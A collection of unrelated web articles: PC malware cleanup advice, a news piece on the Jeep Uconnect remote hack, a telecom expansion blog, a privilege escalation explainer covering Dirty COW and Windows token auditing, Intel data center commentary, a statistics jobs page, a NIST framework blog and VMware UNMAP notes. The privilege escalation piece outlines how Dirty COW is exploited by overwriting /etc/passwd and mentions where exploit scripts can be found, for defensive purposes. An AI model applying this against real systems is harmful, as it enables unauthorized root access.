There are three major factors at play here, which illustrate why running a “cleaner” tool is often not enough:
Malware has become increasingly more sophisticated and capable of hiding from or disabling anti-malware scanners. These days only a forensic-level investigation can detect certain malware under some conditions.
Malware authors now have easy access to tools that let them run their creations through dozens of antivirus engines at once. Some of these tools do not deliver scanned samples to antivirus companies for analysis, so a malware author can simply keep tweaking his/her creation until it is no longer detected, and then deploy it to your network via existing botnets infections, malvertising, spear-phishing, and other attack vectors.
As evidenced by the botnets detailed above, more malware authors are taking advantage of pay-per-install services. These systems will always try to maximize profit and install multiple unique pieces of malware after they initially infect a PC. To date, antivirus has been shown to generally have a 20% or less effectiveness rate against new threats. So for each pay-per-install infection, if you detect one bot, there might be four more installed alongside that aren’t detected.
The major risk is that while you might have removed the nuisance malware, something more sinister may still be lying in wait to steal or destroy data. Any compromise of a PC should be treated as if it has the potential to do the maximum damage. One could hire a malware expert to do low-level forensic analysis on the infected system, but in some cases, it comes down to the skill of the expert versus the skill of the malware author – both are essentially unknowns. This is why we repeat the mantra of “re-format/re-image” – it’s the only way to effectively mitigate the risk with a high level of assurance. | <urn:uuid:7ecc3e3e-d85b-4365-b337-88329888977f> | CC-MAIN-2022-40 | https://etc-md.com/2011/03/17/how-to-clean-an-infected-windows-pc/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00114.warc.gz | en | 0.945891 | 546 | 2.53125 | 3 |
Last Updated on August 7, 2015
You are driving your Cherokee Jeep like you normally do, you tune the radio on your favorite station, and you suddenly realize there is something completely wrong. The car does not follow your orders anymore: the radio tuner ignores your settings and chooses the radio station on its own, the windshield wipers turn on and, even worse, the car decides autonomously when steering, accelerating or braking.
What it could seem a science fiction movie (ideally an episode of The Twilight Zone) is getting real and, more in detail, is the result of a car-hacking research two well known security researchers had been doing over the past year.
Charlie Miller and Chris Valasek have exploited (and demonstrated on a busy highway) a severe vulnerability on Uconnect, an infotainment system “that brings interactive ability to the in-car radio and telemetric-like controls to car settings”. This vulnerability allows a potential attacker to take the control of the car from miles away, using its Sprint cellular connection.
The impact of this vulnerability is potentially devastating, considering that Uconnect is installed on millions of FCA (Fiat Chrysler Automotive) cars worldwide. In particular the researchers have discovered that a
weak vulnerable element (which the researchers won’t identify until their Black Hat talk), lets anyone who knows the car’s IP address gain access from anywhere via the Sprint cellular connection used by Uconnect. It’s quite uncanny, isn’t it?
From that entry point is it possible to rewrite the car’s head unit firmware to inplant the malicious code, which is capable of sending custom commands through the CAN bus, the car’s internal computer network, to the physical components like the engine and wheels.
Fortunately, during their presentation at Black Hat, the researchers won’t disclose the code that rewrites the chip’s firmware (this implies that an attacker could take months to reverse the firmware). Besides they have been sharing their research with FCA over the past months, enabling the company to release a patch (to be manually installed) before the Black Hat conference.
In any case, despite the automaker has already patched the vulnerability (but the manual installation procedure will likely leave many cars unprotected), it “did not appreciate” the decision of the two researchers to publish the exploit. Additionally, even the way in which the vulnerability was shown seems quite perplexing: the two researchers maybe went too far, deciding to demo the car hijacking in a busy highway (and several actions performed, such as cutting the transmission, could endanger the lives of the other drivers).
Two things are certain, it’s time for the automotive industry to make security play a central role when designing new models, and it’s also time for a new legislation to tighten car’s protection from cyber attacks. For this second aspect, something is moving though. In the meantime, if you own an FCA car, please update Uconnect as soon as you can. | <urn:uuid:eee8d093-4aa0-435d-847a-1a658073cfe1> | CC-MAIN-2022-40 | https://www.hackmageddon.com/2015/07/21/researchers-show-how-to-remotely-hack-a-jeep/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00114.warc.gz | en | 0.94998 | 627 | 2.53125 | 3 |
Connectivity brings us together, but it is not always an easy road. Mexico is Latin America’s second-largest market, preceded only by Brazil. While mobile technology has long been available in Mexico, access to affordable fixed-line Internet only started to become available in the past decade, and connectivity still varies across the country. This lack of access to Information and Communications Technology (ICT) is known as the digital gap or the digital inequality, and depends on a range of social and geographical factors.
In 2013, following recommendations in an OECD review, Mexico embarked on an overhaul of its telecommunication and broadcast markets to bring more competition, investment and consumer benefits to its telecommunications industry. Telcos and a healthy telecommunications market play critical roles in enabling digital transformation, improving productivity and economic growth, and allowing governments to provide public services.
Prior to this, Mexico had some of the highest telco prices in the OECD, making Internet unaffordable for many in the region. However, bridging the digital gap required Mexico to make communication services more efficient and accessible to people, in particular high-speed broadband, telephony and Internet access in rural areas.
“Before this reform, many Mexicans struggled to pay for long-distance calls to relatives and could not afford mobile Internet services that other countries took for granted. Three-quarters of households had no Internet access. Today, communication services are much more affordable, and millions more people are online.” – Gabriela Ramos, OECD Chief of Staff and G20 Sherpa
A decade of growth and demand
These reforms brought tangible benefits. Among other measures, they opened Mexico’s market, lifted restrictions on foreign direct investment in telecommunication and satellite communication services, and successfully achieved a digital switchover in 2016, which reinforced the country’s domestic communication infrastructures. According to the OECD report, these reforms spurred competition, increased access, lowered prices in mobile broadband by 69 percent to 81 percent and provided higher quality communication services.
“Mobile broadband subscriptions more than tripled between 2012 and 2016, with the addition of 50 million new ones. This meant more revenue for telecommunication and broadcasting players. Growth in the telecommunication and broadcasting sectors has been faster than the broader economy since the reforms, and investment in the sector has increased steadily. Meanwhile, from 2014 to 2017, barriers to trade in the Mexican telecom sector fell faster than in other OECD countries, opening the market to new entrants. The sharp drop in the cost of telephone calls and Internet access overwhelmingly benefitted poorer families in a country where spending on fixed and mobile phone services in the poorest households averaged 10 percent and 6.2 percent of monthly incomes compared with 1.8 percent and 1.2 percent in the wealthiest households.” (OECD Report)
Arelion expands into Mexico
Arelion (formerly Telia Carrier) was among the first major international telecom companies to support Mexico’s international market growth after 2013 market reforms. Collaboration with key partners has resulted in numerous Points of Presence (PoPs) in Mexico, including data centers in Querétaro, Monterrey, Merida, and Mexico City, as well as PoPs in the US border markets in El Paso, Laredo, McAllen and San Diego. Local partners include Neutral Networks, QuattroCom, Equinix, KIO Networks, C3ntro Telecom, Ai Telecom and PoPs in the border markets with MDC, VTX and Edgeconnex
Two of the newest recently announced Points of Presence (PoPs) enhance the ecosystem in Mexico City, enabling local connectivity to Arelion’s number one ranked global backbone, AS1299 and enabling critical applications, such as cloud security services and live video collaboration, locally to their end users avoiding long routes from Mexico to US. The new sites are located in strategic locations in Mexico City located in Santa Fe and Tultitlán.
These PoPs are dynamic, fiber-connected access points providing cloud utility at scale to metro populations and businesses, enabling many companies to expand work-from-home environments via cloud networks. These hubs serve thousands of enterprise companies and millions of local consumers, furnishing secure connectivity for the growing companies of Mexico.
Spanning 70,000 km of fiber and using state-of-the-art DWDM and IP technology, our network infrastructure connects Mexico to the rest of North America, Europe, and Asia, providing new opportunities for local and international businesses. Broadband and mobile operators and ISPs connecting to Arelion’s backbone can provide higher quality access (lower latency, no buffering, higher resolutions) to content delivered to their end-users (residential or businesses), driving demand and growth of local internet traffic.
Future growth opportunities
Mexico continues to be a strategic business and technology hub for many Latin American, American and global businesses. As in other countries around the world, public cloud availability is a key element for the large-scale digital transformations of companies.
Internet traffic in Mexico is exploding. Supply chain challenges impacting the availability of transmission equipment and routing gear have limited growth and access to this emerging area for top cloud, gaming, cloud security and mobile application companies. This expansion and cooperation in bringing Internet connectivity at scale helps meet the immediate demand for this bandwidth.
Arelion’s continued organic expansion in Mexico also provides crucial backbone services for major global services, including content and cloud providers that require low latency and high-speed connectivity as noted in our recent launch announcement with Oracle Cloud in Queretaro. This expansion also creates an opportunity to address regional content providers’ local, in-market connectivity needs, offering them the highest quality service and connectivity for tomorrow’s global businesses.
Businesses in Mexico City can now take advantage of Arelion’s number one ranked global backbone, AS1299, and the local availability of high-speed IP Transit, Cloud Connect, DDoS Mitigation, Ethernet and IPX services for operators, content providers and enterprises alike.
Luis Velasquez, Mexico Business Manager
Subscribe to our blog and keep up-to-date on news, insights and happenings.
As a subscriber you will receive:
- Monthly newsletter summararizing news and events
- Invitations to events and webinars hosted by our thechnology gurus
- Notifications each time there is a new blog | <urn:uuid:70121620-7c7b-4ab7-9ece-2a5dfa25fd1e> | CC-MAIN-2022-40 | https://blog.arelion.com/2022/07/07/mexico-expansion-bridging-borders/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00114.warc.gz | en | 0.932534 | 1,301 | 2.765625 | 3 |
Types of privilege escalation
In general, attackers exploit privilege escalation vulnerabilities in the initial attack phase to override the limitations of their initial user account in a system or application. There are two main types of privilege escalation: horizontal privilege escalation to access the functionality and data of a different user and vertical privilege escalation to obtain elevated privileges, typically of a system administrator or other power user.
With horizontal privilege escalation, malicious actors remain on the same general privilege level but can access data or functionality of other accounts or processes that should be unavailable to them. For example, this may mean using a compromised office workstation to gain access to other office users’ data. For web applications, one example of horizontal escalation might be using session hijacking to bypass authentication and get access to another user’s account on a social site, e-commerce platform, or e-banking site.
More dangerous is vertical privilege escalation (also called privilege elevation), where the attacker gains the rights of a more privileged account – typically the administrator or system user on Microsoft Windows or root on Unix and Linux systems. With this elevated level of access, the attacker can wreak all sorts of havoc in your computer systems and applications: steal access credentials and sensitive data, download and execute ransomware, erase data, or execute arbitrary code. Advanced attackers will use elevated privileges to cover their tracks by deleting access logs and other evidence of their activity, leaving the victim unaware that an attack took place at all. That way, cybercriminals can covertly steal information and plant backdoors or other malware in company systems.
Why privilege escalation is so dangerous
Privilege escalation is often one part of a multi-stage attack, allowing intruders to deploy a malicious payload or execute malicious code in the targeted system. This means that whenever you detect or suspect privilege escalation, you also need to look for signs of other malicious activity. But even without evidence of further attacks, any privilege escalation incident is an information security issue in itself because someone could have gained unauthorized access to personal, confidential, or otherwise sensitive data. In many cases, this will have to be reported internally or to the relevant authorities to ensure compliance.
Worse still, it can be hard to distinguish between routine and malicious activity to detect privilege escalation incidents. This is especially true for rogue users who might have legitimate access yet perform malicious actions that compromise system or application security. However, if you can quickly detect successful or attempted privilege escalation, you have a good chance of stopping the intruders before they can establish a foothold to launch their main attack.
Privilege escalation on Linux with Dirty COW
Many cyberattacks start by compromising a web server, which is often accessible from the Internet. Attackers can then exploit vulnerabilities or misconfigurations to obtain root privileges on the host system. This may allow them to gain access to the file system and any other server processes running in the same system or even gain a foothold in the local network to launch attacks against other systems. Crucially, web servers are used not just for hosting websites and web applications – many printers, routers, and Internet of Things (IoT) devices routinely run a web server for their administrative interface. Once compromised, such a device can be used to launch further attacks within the local network.
The majority of web servers in use today, including many embedded systems, are hosted on some flavor of Linux. Older versions of the Linux kernel (prior to 4.8.3, 4.7.9, or 4.4.26) were vulnerable to a local privilege escalation attack dubbed Dirty COW (from Dirty Copy-On-Write), which allowed attackers to make read-only memory mappings writable. While this is a local attack, it is still extremely dangerous because the only guaranteed protection is to upgrade the Linux kernel – and that’s not always easy or possible, especially with embedded systems. But how exactly does it work?
To start with, the attacker needs to gain access to a regular, unprivileged user account, usually by exploiting a bug or misconfiguration. Once a user shell is available, it’s now a matter of downloading and executing one of many existing exploit scripts for Dirty COW – see this GitHub page for a list. The vulnerability can be exploited for privilege escalation in different ways, depending on the desired effect. One way is to modify the system password file /etc/passwd by replacing the root user with a newly created user who will then have root privileges.
While Dirty COW is likely the most serious privilege escalation vulnerability ever discovered for Linux, it only affects older and unpatched systems. It also requires access to a local user shell and some way of downloading the exploit script, so you can mitigate its impact by following good security practices listed later in this article.
Detecting privilege escalation in Windows
Microsoft Windows determines the ownership of a running process using access tokens. The access token mechanism can be targeted by attackers to tamper with access tokens, bypass user account control (UAC), and assume the process rights of another user, but in Windows 10 and Windows Server 2016 you can set an audit event to detect any such changes. When you enable the Audit Token Right Adjusted event, the system will generate 4703 events for audit token modifications that may signal privilege escalation attempts.
To enable this audit event, open the Group Policy Management Editor and under Advanced Audit Policy Configuration > Audit Policies > Detailed Tracking set the Audit Token Right Adjusted event to Success and Failure. Now you will receive a 4703 event every time a token right is modified, resulting in a flood of legitimate events from system processes. Use your event monitoring software to narrow this down by searching only for 4703 events related to potentially suspicious changes. One common target for attackers is SeDebugPrivilege – a system privilege that grants a user full debugging access to a process. If this gets set when nobody is doing any debugging, you can be pretty certain something is up.
For details of this audit event, see Audit Authorization Policy Change in the Microsoft docs. See also Security Monitoring Recommendations for tips on filtering the 4703 events generated when you use this method.
How to protect your systems from privilege escalation
Attackers can use many privilege escalation techniques to achieve their goals. But to attempt privilege escalation in the first place, they usually need to gain access to a less privileged user account. This means that regular user accounts are your first line of defense. Follow these best-practice tips to ensure strong access controls:
- Enforce secure password policies for all users: This is the simplest way to improve security (after all, the majority of data breaches start with weak or compromised credentials), though also the hardest to apply in practice. Passwords need to be strong enough to resist guessing and brute force attacks, but your access management choices shouldn’t impact user convenience and productivity.
- Create specialized users and groups with minimum necessary privileges and file access: Apply the principle of least privilege to mitigate the risk posed by any compromised user accounts, both for regular users and administrator accounts. While it’s convenient to give administrators godlike administrative privileges for all system resources, a single account can then provide attackers with a single point of access to the system or local network.
- Educate users to detect social engineering attacks: People love to be helpful, so getting escalated privileges can be as simple as politely asking for login credentials while convincingly posing as IT helpdesk or a distant colleague in distress. Educating all users to be wary of social engineering attempts and phishing emails is vital for cybersecurity.
Applications can provide an entry point for any attack, so it’s vital to keep them secure:
- Avoid common programming errors in your applications: Follow secure development practices to avoid common programming errors that are most often targeted by attackers, such as buffer overflows, code injection, and unvalidated user input.
- Secure your databases and sanitize user inputs: Database systems make especially attractive targets, as many modern web applications and frameworks store all their data in databases – including configuration settings, login credentials, and user data. With just one successful attack, for example by SQL injection, attackers can gain access to all this information and use it for further attacks.
Not all privilege escalation attacks directly target user accounts – administrator privileges can also be obtained by exploiting application and operating system bugs and configuration flaws. With careful systems management, you can minimize your attack surface:
- Deploy security patches as soon as possible: Most attacks exploit well-known vulnerabilities, so by keeping your systems and applications patched and updated, you are severely limiting the attackers’ options.
- Ensure correct permissions for all files and directories: As with user accounts, follow the principle of least privilege – if something doesn’t need to be writable or executable, keep it read-only, even if it means a little more work for administrators.
- Close unnecessary ports and remove unused user accounts: Default system configurations often include unnecessary services running on open ports, and each one is a potential vulnerability. You should also remove or rename default and unused user accounts to avoid giving attackers (or rouge former employees) an easy start.
- Remove or tightly restrict all file transfer functionality: Attackers usually need a way to download their exploit scripts, web shells, and other malicious code, so take a close look at all system tools and utilities that enable file transfers, such as FTP, TFPT, wget, curl and others. Remove the tools you don’t need, and lock down the ones that remain, restricting their use to specific directories, users, and applications.
- Change default credentials on all devices, including routers and printers: Changing the default logon credentials is a crucial step that is often overlooked, especially for less obvious systems, such as printers, routers, and IoT devices. No matter how well you secure your operating systems and applications, just one router with a web interface and a default password of admin is enough to provide attackers with a foothold.
Check your web applications for vulnerabilities
Websites and web applications expose a global attack surface and are often the first port of call for attackers. Use a high-quality vulnerability scanner to check your sites, applications, web services, and web APIs for vulnerabilities. Modern DAST solutions such as Netsparker are accurate and versatile and are under constant development to stay one step ahead of the attackers. Even if your application was secure last month or even last week, new vulnerability reports and exploits are published every day – and your systems and information might well be in danger even as you read these words. | <urn:uuid:fea9e8cc-fbf8-43bd-b3ca-30d3947233fd> | CC-MAIN-2022-40 | https://www.invicti.com/blog/web-security/privilege-escalation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00114.warc.gz | en | 0.90974 | 2,151 | 2.546875 | 3 |
The keyword in the above headline is “could”. The multicore era was not, you may recall, first heralded by Intel. While Intel was basing its data center processing plan on an architecture called Itanium (which had just been dragged, kicking and screaming, into the 64-bit era), AMD made the first inroads towards producing a dual-core, 64-bit, x86 processor with the performance levels that data centers required. Intel was dragged – not kicking and screaming, but certainly dragged – into producing x86 (x64) as its leading processor line for servers.
But because Intel joined the competition, the complexion of data centers changed, mainly due to one aspect of multicore architecture that even today, a decade later, IT departments don’t quite understand, let alone appreciate: Multicore forced process parallelism into the datacenter – yes, kicking and screaming.
The back door to parallelism
Parallelism is the ability for a set of processors and/or cores in a system to run multiple, coordinated threads simultaneously. How a process gets separated into two or more threads is the exact opposite of magic. With the Itanium architecture that preceded x86/x64 into multicore, threads divide explicitly, meaning the process decides when divisions happen. These split points are milestones that are entered into the process code by the compiler.
Parallelism in x86/x64 is largely implicit, meaning the processor takes advantage of opportunities ascertained through an analysis of the code, to determine which parts of processors can be executed in parallel. When Intel created hyperthreading (HT) – a way for one core to run two threads in alternation – its effectiveness was dependent upon software having been compiled in such a way that the processor could make good judgment calls.
And as I reported a decade ago, some processes actually ran more slowly on hyperthreaded processors than on single-threaded ones at the same clock speed. Here’s how I presented the topic in 2005 for the original Tom’s Hardware Guide: “HT is actually one of the many efficiencies that Intel engineers discovered in a way to combat the perennial problem of latency—the fact that single-core processors can spend more than half their clock cycles executing nothing at all.
In the mid-1990s, discovering that traditional single-threaded programs were utilizing only about 35% of a processor’s available resources, Intel realized that, with an added level of hardware sophistication, it could schedule at least one more thread of execution within the unused space. It could only achieve this, however, if each thread “believed” it had the entire processor to itself—including its registers, cache, and access to the front-side bus. So HT schedules the execution of two threads (for now) in alternating fashion—a few cycles for thread #1, a few for thread #2—but only when the results of one thread do not corrupt the image of the CPU for the other. In other words, HT only alternates instructions that cannot get in each other’s way.
The immediate benefit of HT parallelism is that it doesn’t require the software—the programs which constitute each thread—to be aware of any parallelism taking place whatsoever. Each thread, not “knowing” it runs in a split environment, “believes” to have the processor all to itself. As a result, software originally compiled to run on standard single-core processors… need not be recompiled in order to implement parallelism, and to realize at least some boost in performance without involving raising clock speed.”
Four years ago, we saw the proliferation of eight-core processors in the data center, and the dawn of 12-core. But was this necessarily the path of progress? Because most parallelism in use today is implicit, eight cores do not run a process eight times better than one core. As many engineers have told me over the last decade, the net gain from each new core placed onto the stack is exponentially lesser than the previous one. And some told me that the ‘point of no return’ – of adding processor cores that essentially added no real power to the operating system – would be at 10 cores.
Today, we’re approaching the onset of 16-core processors. If there were no real gains to be made after 10 cores, we’d know it already.
The end of the server box
Ever since the onset of the multicore era in 2005, and especially in just the last four years, there have been seismic shifts in software:
* Virtualization has changed the meaning of “process” in a system, and the operating system that runs “user applications” (Linux, Windows Server, Unix) no longer runs as close to the processor as in the previous decade. With the operating system now a “higher-level process,” hypervisors now occupy the lower-level space. This changes the game for multicore, since hypervisors are more homogenous in nature and easier to predict, especially when a company like Intel gives hypervisor makers like VMware and Citrix special processor resources (namely, Intel VT) which they can utilize directly, like an exclusive connection.
- * Cloud platforms have radically altered what it means to be a server. Today, a server is a contributor of real estate and resources to a broader processing system. Compute power, storage capacity, memory, and network bandwidth are all becoming singular variables in a very broad formula. No longer is the processor the central focus of all software development, but one wheel in a colossal machine.
* ‘Big data’ has leveraged the versatility of cloud platforms to pool memory from multiple systems into a single field of operation. In so doing, it has managed to join virtualization in replacing user-level operating systems with much more fundamental kernels like Hadoop – designed specifically to run a handful of specialized analytical tasks. Today, not only can these tasks be optimized to run on certain processors including Intel’s, but conceivably Intel processors can be optimized to run them. In a world where the number of items of software a processor handles is more limited, not only the possibilities but the incentives increase for tailoring processors to match the workload.
* Software-defined networking (SDN) enables logic to intelligently define how a network is configured, and uses CPU-based logic to manage the flow of data. It may be the most rapidly developing technology in the history of the back-office. SDN gives manufacturers like Intel the incentive to tailor their CPUs with functions that enable original equipment manufacturers to leverage them to serve as network masters.
Today, there are justifications for 16-core Xeon (and other manufacturers’) CPUs that we didn’t have in 2008 or even 2010. There are market forces at play here: With PC market growth stalled, and by some measures declining, CPU makers need to find other high-volume sales outlets to keep production costs low. The rapid expansion of cloud datacenters may provide one such outlet, but such facilities typically do not require the highest performance CPUs.
Intel’s current generation of processor architecture is called Haswell. Introduced in 2012, it was designed to move more of the control features that typically appear in a chipset – the separate parts that manage a motherboard, such as voltage control – onto the CPU die. According to the company’s public roadmap for the first half of the year, published last January, its Efficient Performance Server Platform is due for a refresh sometime during the latter half of this year.
So is it time for Intel to endow the Haswell generation of Xeon and Xeon Phi (the high-performance line originally made up of co-processors) with more workload-tailored functionality? This isn’t one of those questions I actually know the answer to already, but am treating as a secret just to make myself sound prescient. If datacenters are truly to replace desktops as the centers of x86/x64 processor architecture, then Intel has to consider the server CPU in the context of what it makes the datacenter become, in the same way it used to consider the PC CPU in the context of what it makes the office become.
I have these questions for Intel this week. All during Datacenter Dynamics’ coverage from Hillsboro, Oregon, I’ll be re-examining these questions to see how well and how deeply they’ve been answered:
Is Intel preparing to facilitate a market of purpose-built server racks – not just single servers or blade clusters, but mechanisms designed to separate compute from storage from memory from power from cooling?
Who is Intel’s most influential partner for Xeon technology: high-performance brands we’ve come to know like HP, Lenovo, and more often, Oracle? Communications companies like Cisco and Alcatel-Lucent? Or the ODMs that we’ve come to know for building smartphones, and who may be building more cloud datacenter servers, such as Quanta Computer?
What new form factors could such purpose-built servers take, that could radically reform the architecture of datacenters themselves in just the next four years’ time (when Intel would need to begin rethinking the question all over again for its next generation)? This and other datacenter publications spend quite a few pages tracking the many corporations that build new datacenters, and list how many square feet they’ll consume. But these habits of ours will start looking antiquated if the design of server racks evolves into something more than the product of a multiplication equation.
What will be the definition of “server” by 2018, and will the fundamental characteristics of datacenter design be impacted by any change to it? Intel is faced with market pressures to compete now against ARM, which is moving a 64-bit version of the technology it created for small and embedded devices, into the datacenter. While we used to reserve the term “bare metal server” for a basic, generic component, it’s becoming something of a kit that can, like an ARM-based embedded device, be built to order. When Intel decides to compete in a market space, that decision changes the space.
If we are at the crossroads of a revolution in data center design, then we had better start fathoming the depths of this change today, and isolate and identify the causes. If not, then we could do without all the drumrolls and fanfare. Our job this week will be to gauge whether the changes ahead of us are monumental or merely incremental. Stay tuned. | <urn:uuid:d0c999d2-5055-41a7-9a1c-123574f9fb1b> | CC-MAIN-2022-40 | https://www.datacenterdynamics.com/en/opinions/how-intel-architecture-could-impact-data-centers-again/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00114.warc.gz | en | 0.944887 | 2,204 | 3.3125 | 3 |
Updated 2022—icrunchdata is proud to publish and host the latest statistics job board index in the field of statistics. Here you can find the latest labor information and future trends for high growth categories of employment in the United States. This statistics jobs report is taken from a sampling of the best statistics job sites, our proprietary data from statistics job boards and is compiled by our research team. This compiled research is focused on a particular skill set, so it's inherently quite targeted yet easily digestible at a glance. We'll be adding more information to this report, so stay tuned. Learn more about our IT job board platform.
Statistics is basically a field of study of data. On its basic fundamentals, statistics is derived from mathematical principals and is the study of data collection, data analysis, including its interpretation and quantification of data. There are statistical principals from which data can be observed. Descriptive statistics focuses on how data is collected and modelling so as to describe it. Inferential statistics takes into account the probability of events and attempts to make predictable outcomes. One of the main stages of statistical research is data analysis. There is primary and secondary data sets. Primary data is data collected for the primary purpose of the statistical problem. Secondary data is data that has been collected for a secondary purpose (like the name suggests). Exploring further, there is qualitative and quantitative data. Qualitative data is such data that cannot be expressed mathematically but rather with language, for example if sampling favorite movie genres, or categorical sizes of small and large. Quantitative data can be quantified mathematically by numbers, for example when sampling currency, ratios, speed, or distance. Data analysis is where findings can be analyzed, visualized and decisions can be made around them. Statistics even uses its own programming language for advanced analysis and applications called R. The R programming language enables statisticians to deploy executable commands and arguments. Then there is Bayesian statistics which is the enhanced study of probabilities and is built upon what we already know to be true. This becomes extremely useful for predicting probable outcomes. Almost all things data-related have been derived from common statistical principals and statistical techniques.
The field of statistics holds the key to almost everything we know in data analysis. The future of statistics is actually already here, as its natural progression from which spawned almost everything, we now consider to be data science, data analytics and even machine learning. There are infinite applications to business, government and even day to day life where the field of statistics can add value. The industry is mature and yet even still it’s growing, which is an excellent combination for newcomers in the field and aspiring mid-level professionals. Career opportunity is abundant, and pursuing continued education is quite attainable since the vast majority of universities offer statistics or statistics-related degree programs for masters and doctorates. Now let’s take a look at career considerations for statistics jobs and how that impacts employment opportunities.
Opportunities in the field of statistics are plentiful, and for job seekers that have experience in data science and advanced analytics (for example) the demand for talent is extremely high. Almost every competitive organization worldwide is hiring talented workers with this background. More information about data science jobs can be found here. There are numerous career paths for professional statisticians that includes but is not limited to; the academia world such as teaching and research, commercial such as the technology and healthcare sectors. The insurance industry continues its demand for the professionals in the actuarial sciences, which is the cousin to statistics. Additionally, the field of statistics abounds with independent projects and research studies, and as data analytics continues its hyper-growth trajectory there will be almost infinite ways to apply a statistical skill set and education. Many social networks maintain statistical groups for networking. And to stay informed on latest happenings in the field and to search statistics jobs, icrunchdata offers many resources to the aspiring statistics professional and student. You can also find many statistics jobs here on icrunchdata by searching for popular titles listed below or customizing your job search. And be sure to check out our pro tips for job seekers.
2. Statistical Modeler
3. Principal Statistician
4. Mathematical Statistician
5. Statistical Analyst
To bring our audience and the general community additional value, icrunchdata has started to release summary reports, trends, and relevant analysis related to jobs in the field including the data scientist salary report and the data science jobs index report.
1. Analytics Job Board Index
2. Artificial Intelligence Job Board Index
3. Big Data Job Board Index
4. Cybersecurity Job Board Index
5. Data Job Board Index
6. Data Analyst Job Board Index
7. Data Science Job Board Index
8. Hadoop Job Board Index
9. Internet of Things - IoT Job Board Index
10. IT Job Board Index
11. Machine Learning Job Board Index
12. SAS Job Board Index
Reach our highly engaged audience and start building your qualified talent pool today. Learn about pricing and features, select a product, and post your job in minutes. | <urn:uuid:4e8a0d2e-52b7-4dd9-999c-2ff9f658461b> | CC-MAIN-2022-40 | https://icrunchdata.com/statistics-jobs/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00315.warc.gz | en | 0.933815 | 1,042 | 2.640625 | 3 |
The NIST Cybersecurity Framework: A Common Language for Cybersecurity Issues
The cybersecurity realm is overwhelming – the issues, the regulations, the changes, the threats, the persistence. We’re living in a world where we hear about new breaches every day. None of us can possibly know everything about all cybersecurity issues, and that’s okay. We’re all vulnerable and overwhelmed, but that’s no excuse not to prepare and continually develop your organization’s defenses. We believe that the NIST Cybersecurity Framework is a way to start having a language and a method to understanding what the issues are and how they should be dealt with.
The core of the NIST Cybersecurity Framework includes:
- Functions – Organization of basic cybersecurity activities at their highest level
- Categories – Subdivisions of a function into groups of particular activities
- Subcategories – Subcategorizes further divide a category into specific outcomes of technical and/or management activities
- Informative References – Specific sections of standards, guidelines, and practices that illustrate a method to achieve the outcome
What is the cybersecurity maturity of your organization? It’s an important question to ask and answer honestly, especially when considering the Framework Implementation Tiers:
- Partial – Informal, reactive, limited awareness
- Risk Informed – Approved but not implemented, the staff has adequate resources to perform their cybersecurity duties, not formalized in its capabilities to interact and share information externally
- Repeatable – Risk management is a formal function and updated regularly, changes in business requirements are reflected in the organization-wide cybersecurity practices, your organization understands its dependencies on partners and interacts accordingly
- Adaptive – The cybersecurity practices adapt based on lessons learned and predictive indicators which results in continuous improvement, adapts to a changing landscape in a timely manner, cybersecurity risk management is part of the organizational culture, communication, and interaction with partners occurs before a cybersecurity event occurs
Healthcare organizations desperately need individuals who will volunteer to lead the conversation about cybersecurity issues; you don’t have to be a cybersecurity expert, just a good communicator. Our hope? In 5 years, everyone within an organization will understand the language of cybersecurity and will be involved in the cybersecurity conversation. It’s not just IT’s issue, or an executive’s responsibility, or the administration’s problem. Can you be the person at your organization to step up and lead the conversation?
To learn more about our HIPAA compliance services, contact us today. | <urn:uuid:84c55055-6c19-4f6d-a24d-69050285ba75> | CC-MAIN-2022-40 | https://kirkpatrickprice.com/webinars/using-nist-cybersecurity-framework-to-protect-phi/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00315.warc.gz | en | 0.922437 | 515 | 2.515625 | 3 |
Space reclamation API helps storage partners to efficiently reclaim deleted space in coordination with vSphere. It is a garbage collection process for thin volumes to help storage arrays reuse deleted space.
ESXi 5.0 Background: VMware introduced a new feature in vSphere 5.0 called “space reclamation” as part of block VAAI thin provisioning. This feature was designed to efficiently reclaim deleted space to meet continuing storage needs. ESXi 5.0 issued UNMAP commands for space reclamation during several
operations. Because of varying or slow response time from storage devices, VMware recommended disabling UNMAP on ESXi 5.0 hosts with thin provisioned LUNs.
In ESX 5.0 U1 VMware implemented the vmkfstools command with revised –y option enabling customers to reclaiming unused space during their maintenance window provided that storage arrays support UNMAP for hardware acceleration. Because system performance is less of a concern during a maintenance window, customers could run the vmkfstools command as needed to consolidate storage. Partners with T10 compliant storage arrays that implement the UNMAP command could take advantage of this feature.
vSphere issues UNMAP command for Space Reclamation during several operations such as Storage vMotion, Snapshot consolidation. UNMAP is issued to storage devices in critical regions with the expectation that the operation would complete quickly. However, the implementation and response times
for this command to ESX varies significantly among sample set of storage arrays from the ecosystem. This variation of response times in critical regions can potentially interfere with other services.
When the UNMAP is issued on the free blocks in a volume, it is required to ensure that those blocks are not allocated to another file until the UNMAP operation completes. The mechanism used is to allocate these
blocks to a temporary file.
In ESX5.O U1 and ESX5.1, the temp file(s) were created at the start of the operation and then an UNMAP was issued to all the blocks that were allocated to these temp files. If the temp file(s) take up all the free blocks in the volume then any other operation that required a block allocation would fail. To prevent this scenario we allowed the user to specify the % of the free blocks the temp file(s) would use
• Why did we have to create these large temp files?
Let’s assume that you create a temp file of size 200 MB – assuming 1 MB vmfs block size. This file would contain 200 blocks. If we issue UNMAP on all 200 blocks and place them back on the free list, the next
time you create another temp file of size 200 MB the same blocks that were just "unmapped" could be allocated to this file as well. Therefore, we would not be making any progress in issuing UNMAP to all the unused blocks in the volume. So it is required to allocate all the free blocks in one instance and issue UNMAP on the entire blocks.
• What is being changed in ESX 5.5?
We have introduced a new kernel interfaces in ESX 5.5 that would allow the user to ask for blocks beyond a user-specified block address in the file system (See below for detailed implementation). Using these interfaces we can ensure that the blocks allocated to a file were never allocated to this file previously.
